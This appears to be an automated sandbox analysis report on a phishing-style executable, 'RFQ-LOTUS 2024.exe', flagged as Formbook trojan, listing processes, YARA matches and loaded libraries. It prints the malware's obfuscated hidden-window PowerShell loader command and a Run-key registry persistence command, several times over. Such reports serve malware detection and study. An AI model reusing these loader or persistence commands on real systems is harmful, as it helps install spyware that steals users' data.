Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00139BD0		18_2_00139BD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00122BF0		18_2_00122BF0

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: String function: 2314B970 appears 126 times
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: String function: 231A7E54 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: String function: 231DF290 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: String function: 231CEA12 appears 58 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02C5B970 appears 254 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02CB7E54 appears 95 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02CDEA12 appears 86 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02CEF290 appears 103 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02CA5130 appears 36 times

Source: RFQ-LOTUS 2024.exe

Static PE information: invalid certificate

Source: RFQ-LOTUS 2024.exe, 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameexchangeable rehidden.exe4 vs RFQ-LOTUS 2024.exe

Source: RFQ-LOTUS 2024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"

Source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@38/19@16/13

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040327D

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

File created: C:\Users\user\AppData\Roaming\frikirkernes

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

File created: C:\Users\user\AppData\Local\Temp\nsx8F79.tmp

Jump to behavior

Source: RFQ-LOTUS 2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ-LOTUS 2024.exe	ReversingLabs: Detection: 18%
Source: RFQ-LOTUS 2024.exe	Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

File read: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=1844,i,13896805619792055621,4904984186317892360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2052,i,55276660867092157,14850349657690875544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Minken.exe "C:\Users\user\AppData\Local\Temp\Minken.exe"
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Minken.exe "C:\Users\user\AppData\Local\Temp\Minken.exe"			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=1844,i,13896805619792055621,4904984186317892360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2052,i,55276660867092157,14850349657690875544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: oleacc.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: shfolder.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: riched20.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: usp10.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: msls31.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll			Jump to behavior
